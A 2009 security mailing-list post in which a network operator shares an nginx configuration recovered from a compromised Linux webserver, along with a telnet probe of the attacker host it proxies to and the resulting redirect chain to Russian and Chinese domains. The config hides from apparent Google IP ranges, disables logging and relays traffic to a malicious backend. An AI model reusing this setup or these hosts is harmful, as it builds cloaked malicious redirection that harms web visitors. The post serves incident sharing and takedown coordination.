[nsp-sec] Linux webserver botnet

Tom Daly tom at dyn.com
Tue Sep 15 15:49:42 EDT 2009 

> They also said there was an abnormally high number of e-mail accounts
> associated with mail.ru so they have blocked that for now.  They are
> also
> working on adding more verification features to make it harder for
> this to
> happen.

We've seen the same thing, random e-mail accounts at various domains, from all over the place. We're mining the database now to see if you can find more hostnames.

One thing we did manage to find was a copy of the nginx.conf used on one of the r00ted linux boxes. It looks like this:

tom at dhcp-241:~/test/nginx/conf$ cat nginx.conf
user root;
worker_processes  2;

error_log  logs/error.log  notice;
worker_rlimit_nofile 10240;

events { worker_connections  8192; use epoll;}

http {
  include       mime.types;
  access_log  off;

  sendfile        on;
  tcp_nopush     on;
  tcp_nodelay    on;
  keepalive_timeout  0;
  server_tokens off;
  server_names_hash_bucket_size 64;

  #//G
  deny 64.233.160.0/19;
  deny 66.102.0.0/20;
  deny 66.249.64.0/19;
  deny 72.14.192.0/18;
  deny 74.125.0.0/16;
  deny 89.207.224.0/24;
  deny 193.142.125.0/24;
  deny 194.110.194.0/24;
  deny 209.85.128.0/17;
  deny 216.239.32.0/19;

  server {
    listen 8080;
    location / {
      proxy_pass        http://mdvhost.com:4480;
      proxy_redirect    off;
      proxy_ignore_client_abort on;
      proxy_set_header  X-Real-IP  $remote_addr;
      proxy_set_header  Host        $host;
      proxy_buffers     100 50k;
      proxy_read_timeout 300;
      proxy_send_timeout 300;
    }
	location = /info { stub_status on; }
  }

}

tom at dhcp-241:~$ telnet mdvhost.com 4480
Trying 95.211.98.139...
Connected to mdvhost.com.
Escape character is '^]'.
GET /ts/in.cgi?reopen HTTP/1.0
Host:mdvhost.com

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 15 Sep 2009 17:33:56 GMT
Content-Type: text/html
Connection: close
Set-Cookie: SL_reopen_0000=_1_; domain=traffcount.cn; path=/; expires=Wed, 16-Sep-2009 19:43:36 GMT
Set-Cookie: TSUSER=reopen; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=traffcount.cn
Set-Cookie: SL_default_0000=_1_; domain=traffcount.cn; path=/; expires=Wed, 16-Sep-2009 19:43:36 GMT
Location: http://sexfinish.ru:8080/index.php

<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://sexfinish.ru:8080/index.php'">
</head>
<body>
document moved <a href="http://sexfinish.ru:8080/index.php">here</a>
</body>
</html>
Connection closed by foreign host.

Should we consider trying to get mdvhost.com and sexfinish.ru pulled from their TLDs or get DNS hosting shut down?

-- 
Tom Daly
CTO, Dynamic Network Services, Inc.
Ph: 603-296-1537
http://dyn.com/

More information about the nsp-security mailing list